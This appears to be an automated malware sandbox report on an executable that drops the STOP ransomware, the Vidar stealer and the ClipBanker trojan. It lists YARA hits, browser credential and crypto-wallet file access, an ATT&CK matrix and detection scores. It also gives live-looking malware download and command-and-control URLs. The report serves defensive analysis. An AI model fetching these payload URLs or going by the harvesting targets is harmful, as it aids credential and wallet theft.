___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_004335E7
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	1_2_00432B6D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	1_2_0042BF17
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	1_2_00432FAD

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_00427756 cpuid

1_2_00427756

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0040A933 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040A933

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

1_2_00419F90

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

0_2_00403341

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0040303E BuildCommDCBAndTimeoutsA,CreateMailslotA,GetDriveTypeA,GetCurrentDirectoryW,CallNamedPipeW,MoveFileExW,SearchPathA,GetVersionExA,OpenWaitableTimerA,FindNextVolumeMountPointW,FindNextVolumeMountPointW,ReadConsoleInputA,GetLogicalDriveStringsA,CreateDirectoryExW,FindNextVolumeMountPointW,GlobalLock,GetModuleHandleA,GetWindowsDirectoryW,SetMailslotInfo,CreateFileW,AddConsoleAliasW,IsProcessInJob,GetProcessPriorityBoost,EnumCalendarInfoExA,QueryDosDeviceW,GetConsoleTitleA,FillConsoleOutputAttribute,SetVolumeLabelA,CompareStringW,

0_2_0040303E

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match

File source: 0000000A.00000000.378213612.0000000000627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Scheduled Task/Job	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	2 Data Encrypted for Impact
Default Accounts	3 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	112 Process Injection	2 Obfuscated Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Services File Permissions Weakness	1 Scheduled Task/Job	2 Software Packing	1 Credentials in Registry	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	11 Masquerading	NTDS	54 System Information Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	125 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Services File Permissions Weakness	31 Virtualization/Sandbox Evasion	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	112 Process Injection	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Services File Permissions Weakness	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
U59WtZz2Sg.exe	36%	Virustotal		Browse
U59WtZz2Sg.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe	45%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe	92%	ReversingLabs	Win32.Trojan.ClipBanker
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	92%	ReversingLabs	Win32.Trojan.ClipBanker

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.0.U59WtZz2Sg.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.0.U59WtZz2Sg.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.U59WtZz2Sg.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.0.U59WtZz2Sg.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.0.U59WtZz2Sg.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.U59WtZz2Sg.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.2.U59WtZz2Sg.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.2.U59WtZz2Sg.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
6.2.U59WtZz2Sg.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.2.U59WtZz2Sg.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
14.0.mstsca.exe.ee0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
17.0.U59WtZz2Sg.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
14.2.mstsca.exe.ee0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
5.0.U59WtZz2Sg.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.0.U59WtZz2Sg.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.U59WtZz2Sg.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.2.U59WtZz2Sg.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
17.0.U59WtZz2Sg.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
8.2.build2.exe.20d15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.U59WtZz2Sg.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
11.2.build3.exe.b90000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
9.0.U59WtZz2Sg.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
5.0.U59WtZz2Sg.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
11.0.build3.exe.b90000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
17.0.U59WtZz2Sg.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
9.0.U59WtZz2Sg.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1223627	Download File

Domains

Source	Detection	Scanner	Label	Link
uaery.top	22%	Virustotal		Browse
fresherlights.com	19%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://facebook.github.io/react/docs/error-decoder.html?invariant	0%	URL Reputation	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt	0%	URL Reputation	safe
http://uaery.top/dl/build2.exeJ_	100%	Avira URL Cloud	malware
http://fresherlights.com/files/1/build3.exerun	100%	Avira URL Cloud	malware
https://we.tl/t-5UcwRdS3ED	0%	Avira URL Cloud	safe
http://88.198.94.71/176356074953.zip	0%	Avira URL Cloud	safe
http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW	100%	Avira URL Cloud	malware
http://fresherlights.com/files/1/build3.exe(	100%	Avira URL Cloud	malware
https://we.tl/t-5UcwRdS3	0%	Avira URL Cloud	safe
http://uaery.top/dl/build2.exe	100%	Avira URL Cloud	malware
http://uaery.top/dl/build2.exe$run	100%	Avira URL Cloud	malware
http://fresherlights.com/test1/get.php	100%	Avira URL Cloud	malware
http://88.198.94.71/	0%	Avira URL Cloud	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
http://fresherlights.com/files/1/build3.exe$run	100%	Avira URL Cloud	malware
http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true	100%	Avira URL Cloud	malware
http://88.198.94.71/517	0%	Avira URL Cloud	safe
http://uaery.top/dl/build2.exerunk6	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
uaery.top	116.121.62.237	true	true	22%, Virustotal, Browse	unknown
fresherlights.com	222.236.49.123	true	true	19%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
api.2ip.ua	162.0.217.254	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/asifrazatg	false		high
http://uaery.top/dl/build2.exe	true	Avira URL Cloud: malware	unknown
http://88.198.94.71/176356074953.zip	false	Avira URL Cloud: safe	unknown
http://fresherlights.com/test1/get.php	true	Avira URL Cloud: malware	unknown
http://88.198.94.71/	false	Avira URL Cloud: safe	unknown
http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true	true	Avira URL Cloud: malware	unknown
http://88.198.94.71/517	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://fresherlights.com/files/1/build3.exerun	U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://searchads.msn.net/.cfm?&&kp=1&	U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.inkscape.org/)	U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.youtube.com/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.google.com/document/B	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/	U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
http://uaery.top/dl/build2.exeJ_	U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	false		high
